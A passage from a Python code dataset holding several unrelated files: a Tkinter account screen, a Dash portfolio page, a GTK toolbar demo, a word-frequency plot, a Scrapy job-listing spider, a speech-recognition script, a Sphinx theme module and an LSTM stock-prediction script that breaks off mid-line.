menudiemdanh=Button(bg,image=ing_menudiemdanh,bd=0,highlightthickness=0,command=menudiemdanh)\n menudiemdanh.place(x=46,y=248)\n\n menuthongke=Button(bg,image=ing_menuthongke,bd=0,highlightthickness=0,command=menuthongke)\n menuthongke.place(x=46,y=366)\n\n menutaikhoan=Button(bg,image=ing_menutaikhoan,bd=0,highlightthickness=0)\n menutaikhoan.place(x=46,y=484)\n\n btndangxuat=Button(bg,image=ing_btndangxuat,bd=0,highlightthickness=0,command=dangxuat)\n btndangxuat.place(x=248,y=44)\n\n \n Label(bg,text=tengv,font=(\"Baloo Tamma\",14),fg=\"#A672BB\",bg=\"white\").place(x=45,y=40)\n\n lbgv=Label(bg,text=tengv,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbgv.place(x=570,y=205)\n \n lbtk=Label(bg,text=tenkh,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbtk.place(x=570,y=145)\n\n lbe=Label(bg,text=email,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbe.place(x=570,y=265)\n\n lbsdt=Entry(bg,textvariable=sdt,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\",bd=0,highlightthickness=0,)\n lbsdt.place(x=570,y=325)\n\n btn_capnhatsdt=Button(bg,image=ing_capnhatsdt,bd=0,highlightthickness=0,command=capnhat_sdt)\n btn_capnhatsdt.place(x=925,y=310)\n\n if lichgiang == []:\n lbcg=Label(bg,text=\"Hôm nay, bạn không có tiết giảng\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbcg.place(x=570,y=385)\n else:\n lbcg=Label(bg,text=\"Hôm nay, bạn có lịch giảng !\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbcg.place(x=570,y=385)\n btnthongbao=Button(bg,image=ing_btnthongbao,bd=0,highlightthickness=0,command=chuyentrang_lichgiang)\n btnthongbao.place(x=920,y=365)\n lbstb=Label(bg,text=len(lichgiang),fg=\"red\",font=(\"Arial\",10),bg=\"white\")\n lbstb.place(x=952,y=360)\n\n if gvdd == []:\n lbdd=Label(bg,text=\"Bạn thực hiện việc điểm danh rất tốt\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbdd.place(x=570,y=445)\n else:\n lbdd=Label(bg,text=\"Có lẽ bạn đã quên điểm danh !\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbdd.place(x=570,y=445)\n btnthongbaodd=Button(bg,image=ing_btnthongbao,bd=0,highlightthickness=0,command=thongbaodd)\n btnthongbaodd.place(x=920,y=425)\n lbstb1=Label(bg,text=len(gvdd),fg=\"red\",font=(\"Arial\",10),bg=\"white\")\n lbstb1.place(x=952,y=420)\n\n btndoimatkhau=Button(bg,image=ing_btndoimatkhau,bd=0,highlightthickness=0,command=btndoimatkhau)\n btndoimatkhau.place(x=672,y=539)\n\n btndangxuat1=Button(bg,image=ing_btndangxuat1,bd=0,highlightthickness=0,command=dangxuat)\n btndangxuat1.place(x=836,y=537)\n\n # btnthietlap=Button(bg,image=ing_btnthietlap,bd=0,highlightthickness=0,command=thietlap)\n # btnthietlap.place(x=949,y=2)\n \n win.mainloop()\n\nif __name__ == '__main__':\n main()","sub_path":"taikhoan.py","file_name":"taikhoan.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"387994374","text":"import plotly_express as px\nimport plotly.graph_objs as go\n\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport dash_daq as daq\nfrom dash.dependencies import Input, Output, State\nimport dash_table\nimport dash_bootstrap_components as dbc\n\n\napp = dash.Dash(\n __name__,\n external_stylesheets=[dbc.themes.FLATLY],\n meta_tags=[\n {\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1.0\"}\n ]\n)\n\napp.config['suppress_callback_exceptions'] = True\n\nnavbar = dbc.NavbarSimple(\n children=[],\n brand=\"Beetle\",\n color=\"primary\",\n dark=True\n)\n\nicon_name = ['static/facebook.png', 'static/twitter.png', 'static/insta.png']\nurl_list = ['https://www.facebook.com/i80846dx2/',\n 'https://twitter.com/i80486dx23419', 'https://www.instagram.com/takuya3419/']\n\nmy_img = dbc.CardColumns([\n dbc.Card(\n [dbc.CardImg(src=\"/static/face.png\", top=True),\n dbc.CardBody([\n html.H5(\"Beetle\", className=\"card-title\"),\n dbc.Button(\n \"Contact\",\n color=\"primary\",\n id=\"collapse-button\"\n ),\n dbc.Collapse(\n [\n dbc.Row([\n dbc.Col(\n html.A(\n html.Img(src=icon,\n height=\"30px\"),\n href=link\n )\n )\n for icon, link in zip(icon_name, url_list)])\n ],\n id=\"collapse\",\n style={'padding': '10pt 0 0 0',\n 'borderWidth': '0'}\n )\n ])]\n )\n])\n\nhobby_list = ['ドライブ', 'サイクリング', 'サカナクション', 'KIRINJI']\nhobby = [\n dbc.CardImg(src=\"/static/hobby.png\", top=True),\n dbc.CardHeader(\"趣味\", style={'font-weight': 'bold'}),\n dbc.CardBody(\n [\n html.Li(\n key,\n className=\"card-text\",\n )\n for key in hobby_list\n ]\n )\n]\n\nkeyword = ['python', 'Raspberry Pi', 'IoT', 'plotly', 'Dash']\nskills = [\n dbc.CardHeader('キーワード', style={'font-weight': 'bold', 'color': 'black'}),\n dbc.CardBody(\n [\n html.Li(\n key,\n className=\"card-text\",\n )\n for key in keyword],\n style={'color': 'black'}\n )\n]\n\n# video\narm = [\n html.Video(\n src='static/servo.mov',\n style={'width': '100%'},\n autoPlay=True,\n loop=True,\n muted=True\n ),\n dbc.CardHeader('obnizを用いたサーボの制御', style={'font-weight': 'bold'})\n]\n\nai_car = [\n html.Video(\n src='static/ai.mov',\n style={'width': '100%'},\n autoPlay=True,\n loop=True,\n muted=True\n ),\n dbc.CardHeader('SOVO代替プロジェクト', style={'font-weight': 'bold'})\n]\n\ncutter = [\n html.Video(\n src='static/cutter.mov',\n style={'width': '100%'},\n autoPlay=True,\n loop=True,\n muted=True\n ),\n dbc.CardHeader('レーザーカッターによるアクリル板の切断', style={'font-weight': 'bold'})\n]\n\n# article\nsv = [\n dbc.CardImg(src=\"/static/sv.png\", top=True),\n dbc.CardBody(\n [\n html.H5(\"シリコンバレー\", className=\"card-title\"),\n html.P(\n \"シリコンバレーに2週間滞在し、現地で企業見学をしたりコワーキングスペースでIoTデバイスを開発したりした。\"\n ),\n dbc.Button(dbc.CardLink(\n 'Read more', href='https://i80486dx2.blogspot.com/',target=\"_blynk\"), color=\"light\"),\n ]\n ),\n]\n\nnz = [\n dbc.CardImg(src=\"/static/nz.png\", top=True),\n dbc.CardBody(\n [\n html.H5(\"ニュージーランド\", className=\"card-title\"),\n html.P(\n \"ニュージーランドのワイカトにて、3週間に渡る語学研修に参加した。\",\n className=\"card-text\",\n ),\n dbc.Button(dbc.CardLink(\n 'Read more', href='https://docs.google.com/presentation/d/1fwsToLe9pwLEZ9H8nWkKPj5uiYi_l79lv-2rPHA5yOQ/edit?usp=sharing',target=\"_blynk\"), color=\"light\"),\n ]\n ),\n]\n\ngugen = [\n dbc.CardImg(src=\"https://gugen.jp/uploads/20191103095639525.png\", top=True),\n dbc.CardBody(\n [\n html.H5(\"Skeleton recognition\", className=\"card-title\"),\n html.P(\n \"シリコンバレーで生まれた作品をGUGENで展示した。\",\n className=\"card-text\",\n ),\n 
dbc.Button(dbc.CardLink(\n 'Read more', href='https://gugen.jp/entry2019/2019-019',target=\"_blynk\") ,color=\"light\")\n ]\n ),\n]\n\ne_2018 = ['6月 会津の未来を考える提言(アイデアソン)優秀賞受賞',\n '12月 Yahoo! Hack Day 2018 (学外ハッカソン) 出場']\ne_2019 = ['2月 TDKハッカソン (学内ハッカソン) 優勝', '6月 Spa Jam 仙台予選 (学外ハッカソン) 出場', '7月 令和初ハッカソン 出場',\n '10月 健康作りハッカソン(学内ハッカソン)優秀賞受賞', '11月 目指せ愛されキャラ!推しキャラハッカソン (学外ハッカソン)最優秀賞受賞', '12月 GUGEN 一次審査突破 作品展示(東京)']\ne_2020 = ['5月 コロナウイルスにITで立ち向かおう! グッドアイディア賞 グッドプロトタイプ賞 受賞']\n\ndata = ['2018']\ndata.append(html.Br())\nfor y1 in e_2018:\n data.append(\n html.P(\n y1,\n className=\"card-text\",\n )\n )\ndata.append('2019')\nfor y2 in e_2019:\n data.append(\n html.P(\n y2,\n className=\"card-text\",\n )\n )\ndata.append(html.Br())\ndata.append('2020')\nfor y3 in e_2020:\n data.append(\n html.P(\n y3,\n className=\"card-text\",\n )\n )\ndata.append(html.Br())\n\nevent = [\n dbc.CardImg(src=\"/static/presen.png\", top=True),\n dbc.CardHeader('出場イベント', style={'font-weight': 'bold'}),\n dbc.CardBody(\n [\n html.P(\n 'アイデアソン:1件',\n className=\"card-text\",\n ),\n html.P(\n 'ハッカソン:8件',\n className=\"card-text\",\n ),\n dbc.Button(\n \"Read more\",\n color=\"light\",\n id=\"collapse-button2\"\n ),\n dbc.Collapse(\n data,\n id=\"collapse2\",\n style={'padding': '10pt 0 0 0'}\n )\n ]\n )\n]\n\ncards = html.Div([\n dbc.CardColumns([\n dbc.Card(hobby, color=\"primary\", inverse=True),\n dbc.Card(ai_car, color=\"secondary\", inverse=True),\n dbc.Card(skills, inverse=True),\n dbc.Card(cutter, color=\"secondary\", inverse=True),\n dbc.Card(sv, color=\"info\", inverse=True),\n dbc.Card(gugen, color=\"warning\", inverse=True),\n dbc.Card(arm, color=\"secondary\", inverse=True),\n dbc.Card(event, color=\"danger\", inverse=True),\n dbc.Card(nz, color=\"success\")\n ])\n])\n\n\napp.layout = html.Div([\n navbar,\n dbc.Row([\n dbc.Col(\n [\n my_img\n ],\n style={'padding': '30pt 0 0 0'},\n width={'size': 6, 'offset': 3}\n ),\n dbc.Col(\n [\n cards\n ],\n style={'padding': '30pt 0 0 0'},\n width={'size': 6, 'offset': 3}\n )\n ]\n )\n])\n\n\n@ app.callback(\n Output(\"collapse\", \"is_open\"),\n [Input(\"collapse-button\", \"n_clicks\")],\n [State(\"collapse\", \"is_open\")],\n)\ndef toggle_collapse(n, is_open):\n if n:\n return not is_open\n return is_open\n\n\n@ app.callback(\n Output(\"collapse2\", \"is_open\"),\n [Input(\"collapse-button2\", \"n_clicks\")],\n [State(\"collapse2\", \"is_open\")],\n)\ndef toggle_collapse2(n, is_open):\n if n:\n return not is_open\n return is_open\n\n\ndef make_data():\n e_2018 = []\n e_2019 = []\n e_2020 = []\n\n data = ['2018']\n for y1 in e_2018:\n data.append(\n html.P(\n y1,\n className=\"card-text\",\n )\n )\n data.append('2019')\n for y2 in e_2019:\n data.append(\n html.P(\n y2,\n className=\"card-text\",\n )\n )\n data.append('2020')\n for y3 in e_2019:\n data.append(\n html.P(\n y3,\n className=\"card-text\",\n )\n )\n\n\nif __name__ == '__main__':\n make_data()\n app.run_server(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"20186057","text":"#!/usr/bin/env python\n\nimport gtk\n\nclass Toolbar(gtk.Window):\n def __init__(self):\n gtk.Window.__init__(self)\n self.set_title(\"Toolbar\")\n self.set_default_size(500, -1)\n self.connect(\"destroy\", gtk.main_quit)\n\n toolbar = gtk.Toolbar()\n self.add(toolbar)\n\n toolbutton1 = gtk.ToolButton(gtk.STOCK_ADD)\n toolbar.insert(toolbutton1, 0)\n toolbutton2 = gtk.ToolButton(gtk.STOCK_REMOVE)\n toolbar.insert(toolbutton2, 1)\n\n separatortoolitem = gtk.SeparatorToolItem()\n toolbar.insert(separatortoolitem, 2)\n\n toggletoolbutton = gtk.ToggleToolButton(gtk.STOCK_MEDIA_PLAY)\n toolbar.insert(toggletoolbutton, 3)\n\n separatortoolitem = gtk.SeparatorToolItem()\n toolbar.insert(separatortoolitem, 4)\n\n radiotoolbutton1 = gtk.RadioToolButton(None, gtk.STOCK_NEW)\n toolbar.insert(radiotoolbutton1, 5)\n radiotoolbutton2 = gtk.RadioToolButton(radiotoolbutton1, gtk.STOCK_OPEN)\n toolbar.insert(radiotoolbutton2, 6)\n\n separatortoolitem = gtk.SeparatorToolItem()\n toolbar.insert(separatortoolitem, 7)\n\n menutoolbutton1 = gtk.MenuToolButton(gtk.STOCK_GO_BACK)\n toolbar.insert(menutoolbutton1, 8)\n menutoolbutton2 = gtk.MenuToolButton(gtk.STOCK_GO_FORWARD)\n toolbar.insert(menutoolbutton2, 9)\n\nwindow = Toolbar()\nwindow.show_all()\n\ngtk.main()\n","sub_path":"examples/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"636467773","text":"from analyze_mecab import analyze_keitaiso\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.font_manager\r\nfontprop = matplotlib.font_manager.FontProperties(fname=\"/home/ohya/.pyenv/versions/anaconda3-4.3.0/lib/python3.6/site-packages/matplotlib/mpl-data/fonts/ttf/ipaexm.ttf\")\r\ndef word_dic(keitaiso_list):\r\n word_dic = {}\r\n for keitaiso in keitaiso_list:\r\n word = keitaiso[\"base\"]\r\n if not word in word_dic:\r\n word_dic[word] = 0\r\n word_dic[word] = word_dic[word] + 1\r\n return sorted(word_dic.items(),key=lambda x: x[1],reverse=True)[:10]\r\n\r\ntop10 = word_dic(analyze_keitaiso())\r\ntop10 = list(zip(*top10))\r\n_list = [i for i in range(10)]\r\n\r\nplt.bar(_list,top10[1],align = \"center\")\r\nplt.xticks(_list,top10[0],fontproperties = fontprop)\r\nplt.title(\"top10 frequency words\")\r\nplt.savefig(\"top10.png\")\r\n","sub_path":"stage4/ex37.py","file_name":"ex37.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"431166728","text":"\"\"\"\nRubiconPeople spider created on the top of ATSSpider\n\nscrapy crawl rubicon_people -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.rubiconpeople.co.uk/search?qs=\"\n\nSample URL:\n http://www.rubiconpeople.co.uk/search?qs=\n\"\"\"\n\nfrom json import loads\nfrom scrapy.http import Request\nfrom urllib import urlencode\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix, RemoveBadElements\n\n\nclass RubiconPeople(ATSSpider):\n\n name = 'rubicon_people'\n disable_default_field_extractors = True\n\n def start_requests(self):\n path = '/api/content/job?%s' % urlencode({\n \"filter\": \"Industry ne ''\",\n \"orderby\": \"CreatedDate desc\",\n \"top\": \"9\",\n })\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(self.start_urls[0], path)\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n jsonResponse = loads(response.body)\n if jsonResponse:\n # set expected job count\n if not self.expected_job_count_set:\n self.expected_job_count = jsonResponse.get('TotalResults', 0)\n\n results = jsonResponse.get('Results')\n if results:\n for item in results:\n url = urljoin(response.url, item.get('NavigateUrl'))\n loader = BrightcorpItemLoader(selector=item)\n\n loader.add_value(\n 'title', item.get('JobTitle')\n )\n loader.add_value(\n 'location', item.get('JobLocation')\n )\n loader.add_value(\n 'referencenumber',\n item.get('JobReference'),\n Prefix('%s-' % self.name)\n )\n loader.add_value(\n 'date',\n item.get('ModifiedDate'),\n ConvertDateString('%Y-%m-%dT%X.%f')\n )\n loader.add_value('url', url)\n loader.add_value(\n 'description',\n item.get('JobDescription'),\n RemoveBadElements(['img'])\n )\n loader.add_value(\n 'jobtype', item.get('JobType')\n )\n loader.add_value(\n 'jobcategory', item.get('Industry')\n )\n loader.add_value(\n 'baseSalary', item.get('Salary')\n )\n loader.add_value(\n 'skills', item.get('JobSkills')\n )\n loader.add_value('apply_url', url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/rubicon_people.py","file_name":"rubicon_people.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"310828869","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 11 22:18:06 2020\n\n@author: gerard\n\nhttps://realpython.com/python-speech-recognition/\n\"\"\"\n\n\nimport speech_recognition as sr\nimport pyaudio\nimport wave\n\ndef recorder(WAVE_OUTPUT_FILENAME = \"output.wav\"):\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n CHANNELS = 2\n RATE = 44100\n RECORD_SECONDS = 5\n \n p = pyaudio.PyAudio()\n \n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n \n print(\"* recording\")\n \n frames = []\n \n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n \n print(\"* done recording\")\n \n stream.stop_stream()\n stream.close()\n p.terminate()\n \n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n#%%\n# =============================================================================\n# Getting text from audios\n# =============================================================================\n\nr = sr.Recognizer()\n\n#1. Basic\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n audio = r.record(source)\n \n#2. Duration\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n audio = r.record(source, duration=4) #refering to seconds\n \n#3. Offset (starting later)\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n audio = r.record(source, offset=3) #refering to seconds\n \n# Deal with ambient noise\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n r.adjust_for_ambient_noise(source, duration=0.5)\n audio = r.record(source, offset=3) #refering to seconds\n\n# Get a JSON string with all the alternatives\nprint(r.recognize_google(audio, show_all='True'))\n\n#%%\n# =============================================================================\n# Using microphones\n# =============================================================================\n\nr = sr.Recognizer()\nmic = sr.Microphone(device_index=14)\n#print(sr.Microphone.list_microphone_names()) # device_index=3\n\nwith mic as source:\n #r.energy_threshold = 0 #257 by default\n r.adjust_for_ambient_noise(source, duration=2)\n audio = r.listen(source)\n\nprint(r.recognize_google(audio)) #language='sp-SP'\n\n\n\n\n\n\n","sub_path":"scripts/audioBot.py","file_name":"audioBot.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"7079957","text":"import os\r\nimport themata\r\n\r\ndef get_path():\r\n \"\"\"\r\n Return the path to the milkish theme\r\n \"\"\"\r\n return os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\r\n\r\ndef setup(app):\r\n if hasattr(app, \"add_html_theme\"):\r\n theme_path = os.path.abspath(os.path.dirname(__file__))\r\n app.add_html_theme(\"milkish\", theme_path)\r\n app.connect(\"html-page-context\", themata.update_context)\r\n app.connect('build-finished', themata.copy_custom_files)\r\n return {\"version\": themata.__version}","sub_path":"themata/milkish/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"62246998","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport FinanceDataReader as fdr\nimport datetime\nimport matplotlib as mpl\nimport tensorflow as tf\nimport numpy as np\nimport sklearn\nimport sklearn.preprocessing\n\nyear = input(\"몇 년치 주가 로딩? (숫자만):\")\nName = input(\"기업명 입력 (포스코 or SK하이닉스) : \")\ndf = fdr.StockListing(\"kospi\")\nsym = df[df['Name']==Name]['Symbol'].iloc[0]\n#today = datetime.datetime.today()\n#start = today - datetime.timedelta(days = 365*int(year))\nstock_df = fdr.DataReader(sym, \"2014.10.22\", \"2018.10.23\")\n#이평선 계산 후 데이터프레임 컬럼 추가\n#%%\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1,1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1,1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1,1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-1,1))\n return df\n#주어진 시퀀스 렝스와, 주가 데이터로 train, validation, test데이터 셋 자르는 함수\n\n#2/len(df_stock)\ndef load_data(stock, seq_len):\n valid_set_size_percentage = 20\n test_set_size_percentage = 20\n data_raw = stock.as_matrix() # numpy.arrary형식으로 바꾸기\n data = []\n \n # 모든 가능한 길이 seq_len짜리 시퀀스로 만들기\n for index in range(len(data_raw) - seq_len): \n data.append(data_raw[index: index + seq_len])\n \n data = np.array(data);\n valid_set_size = int(np.round(valid_set_size_percentage/100*data.shape[0])); \n test_set_size = int(np.round(test_set_size_percentage/100*data.shape[0]));\n train_set_size = data.shape[0] - (valid_set_size + test_set_size);\n \n x_train = data[:train_set_size,:-1,:]\n y_train = data[:train_set_size,-1,:]\n \n x_valid = data[train_set_size:train_set_size+valid_set_size,:-1,:]\n y_valid = data[train_set_size:train_set_size+valid_set_size,-1,:]\n \n x_test = data[train_set_size+valid_set_size:,:-1,:]\n y_test = data[train_set_size+valid_set_size:,-1,:]\n \n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n#change와 volume 컬럼 삭제하기\ndf_stock = stock_df.copy()\n\ndf_stock.drop(['Change'],1,inplace=True)\ndf_stock.drop(['Volume'],1,inplace=True)\n\ncols = list(df_stock.columns.values)\nprint('df_stock.columns.values = ', cols)\n\n# 주식 데이터 정규화\ndf_stock_norm = df_stock.copy()\ndf_stock_norm = normalize_data(df_stock_norm)\n\n# 트레이닝, 테스트 데이터 생tjd\nseq_len = 10 # choose sequence length\nx_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm, seq_len)\n#print('x_train.shape = ',x_train.shape)\n#print('y_train.shape = ', y_train.shape)\n#print('x_valid.shape = ',x_valid.shape)\n#print('y_valid.shape = ', y_valid.shape)\n#print('x_test.shape = ', x_test.shape)\n#print('y_test.shape = ',y_test.shape)\n\n\n#plt.figure(figsize=(15, 5));\n#plt.grid(True)\n#plt.plot(df_stock.index,df_stock_norm.Open.values, color='red', label='Open')\n#plt.plot(df_stock.index,df_stock_norm.Close.values, color='green', label='Close')\n#plt.plot(df_stock.index,df_stock_norm.Low.values, color='blue', label='Low')\n#plt.plot(df_stock.index,df_stock_norm.High.values, color='black', label='High')\n#\n#plt.title('SK stock')\n##plt.xlabel('시간[일]')\n#plt.ylabel('Normalized Price')\n#plt.legend(loc='best')\n#plt.show()\n#%%\n\nindex_in_epoch = 0;\nperm_array = np.arange(x_train.shape[0])\nnp.random.shuffle(perm_array)\n \n# function to get the next batch\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array \n start = index_in_epoch\n index_in_epoch += batch_size\n \n if index_in_epoch > 
x_train.shape[0]:\n np.random.shuffle(perm_array) # shuffle permutation array\n start = 0 # start next epoch\n index_in_epoch = batch_size\n \n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n# parameters\nn_steps = seq_len-1 \nn_inputs = 4 \nn_neurons = 200 \nn_outputs = 4\nn_layers = 2\nlearning_rate = 0.001\nbatch_size = 50\nn_epochs = 1000\ntrain_set_size = x_train.shape[0]\ntest_set_size = x_test.shape[0]\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_outputs])\n##############################################################################\n##############################################################################\n################## #################\n################## RNN Cell 선택하기 #################\n################## #################\n##############################################################################\n##############################################################################\n\n# use Basic RNN Cell\n#layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.elu)\n# for layer in range(n_layers)]\n\n# use Basic LSTM Cell \n#layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=tf.nn.elu)\n# for layer in range(n_layers)]\n\n# use LSTM Cell with peephole connections\nlayers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, \n activation=tf.nn.leaky_relu, use_peepholes = True)\n for layer in range(n_layers)]\n\n# use GRU cell\n#layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.leaky_relu)\n# for layer in range(n_layers)]\n \n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n##############################################################################\n\nmulti_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)\nrnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32)\n\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons]) \nstacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs)\noutputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs])\noutputs = outputs[:,n_steps-1,:] # keep only last output of sequence\n \nloss = tf.reduce_mean(tf.square(outputs - y)) # loss function = mean squared error \noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) \ntraining_op = optimizer.minimize(loss)\n \n# run graph\nwith tf.Session() as sess: \n sess.run(tf.global_variables_initializer())\n for iteration in range(int(n_epochs*train_set_size/batch_size)):\n x_batch, y_batch = get_next_batch(batch_size) # fetch the next training batch \n sess.run(training_op, feed_dict={X: x_batch, y: y_batch}) \n if iteration % int(5*train_set_size/batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train}) \n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid}) \n print('%.2f epochs: MSE train/valid = %.6f/%.6f'%(\n iteration*batch_size/train_set_size, mse_train, mse_valid))\n\n y_train_pred = sess.run(outputs, feed_dict={X: x_train})\n y_valid_pred = sess.run(outputs, feed_dict={X: x_valid})\n y_test_pred = 
sess.run(outputs, feed_dict={X: x_test})\ncorr_price_development_train = np.sum(np.equal(np.sign(y_train[:,1]-y_train[:,0]),np.sign(y_train_pred[:,1]-y_train_pred[:,0])).astype(int)) / y_train.shape[0]\ncorr_price_development_valid = np.sum(np.equal(np.sign(y_valid[:,1]-y_valid[:,0]),np.sign(y_valid_pred[:,1]-y_valid_pred[:,0])).astype(int)) / y_valid.shape[0]\ncorr_price_development_test = np.sum(np.equal(np.sign(y_test[:,1]-y_test[:,0]),np.sign(y_test_pred[:,1]-y_test_pred[:,0])).astype(int)) / y_test.shape[0]\n\nprint('correct sign prediction for \"close - open\" price for train/valid/test: %.2f/%.2f/%.2f'%(\n corr_price_development_train, corr_price_development_valid, corr_price_development_test))\n\ndef reverse_min_max_scaling(org_x, x):\n org_x_np = np.asarray(org_x)\n x_np = np.asarray(x)\n return (x_np * (org_x_np.max() - org_x_np.min() + 1e-7)) + org_x_np.min()\npred_close = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,0])\npred_open = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,1])\npred_high = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,2])\npred_low = reverse_min_max_scaling(df_stock.copy(),y_test_pred[:,3])\n\n#%%\n\nft = 0 # 0 = close, 1 = open, 2 = highest, 3 = lowest\n\n## show predictions\ntitle_font = {'fontname':'NanumMyeongjo','size':'20','color':'black','weight':'normal','verticalalignment':'bottom'}\naxis_font = {'fontname':'NanumMyeongjo','size':'16'}\n\nplt.figure(figsize=(15, 10));\nplt.subplot(2,1,1);\nplt.grid(True)\nplt.plot(np.arange(y_train.shape[0]), y_train[:,ft], color='blue', label='train target')\n\nplt.plot(np.arange(y_train.shape[0], y_train.shape[0]+y_valid.shape[0]), y_valid[:,ft],\n color='gray', label='valid target')\n\nplt.plot(np.arange(y_train.shape[0]+y_valid.shape[0],\n y_train.shape[0]+y_test.shape[0]+y_test.shape[0]),\n y_test[:,ft], color='black', label='test target')\n\nplt.plot(np.arange(y_train_pred.shape[0]),y_train_pred[:,ft], color='red',\n label='train prediction')\n\nplt.plot(np.arange(y_train_pred.shape[0], y_train_pred.shape[0]+y_valid_pred.shape[0]),\n y_valid_pred[:,ft], color='orange', label='valid prediction')\n\nplt.plot(np.arange(y_train_pred.shape[0]+y_valid_pred.shape[0],y_train_pred.shape[0]+y_valid_pred.shape[0]+y_test_pred.shape[0]),y_test_pred[:,ft], color='green', label='test prediction')\n\nplt.title('Stock of SK Hynix')\n#plt.xlabel('일 수',**axis_font)\nplt.ylabel('normalized price')\nplt.legend(loc='upper left');\n\nplt.subplot(2,1,2);\nplt.grid(True)\nplt.plot(np.arange(y_train.shape[0]+y_test.shape[0], y_train.shape[0]+y_test.shape[0]+len(y_test[:,ft])),\n y_test[:,ft], color='black', label='test target')\n\nplt.plot(np.arange( y_train_pred.shape[0]+y_test_pred.shape[0], \n y_train_pred.shape[0]+y_test_pred.shape[0]+len(y_test_pred[:,ft])),\n y_test_pred[:,ft], color='green', label='test prediction')\n\n\nplt.xlabel('Days')\nplt.ylabel('normalized price')\nplt.legend(loc='best');\n\n#하루기준으로 오르면 1, 내리면 -1로하고, 타겟과 예측이 각각 1,-1로 서로 같으면 true, 다르면 false하여, 트루의 갯수를 합하고, 전체 트레인 타겟의 사이즈로 나 \n\n#%%\ndf22 = pd.DataFrame()\ndd22 = df22.append({\"Close\":\"\", \"Open\":\"\", \"High\":\"\", \"Low\":\"\", \"Volume\":\"\", \"Change\":\"\"}, ignore_index=True)\ndd22.ix[0, \"Close\"] = pred_close[0]\n\nresult = 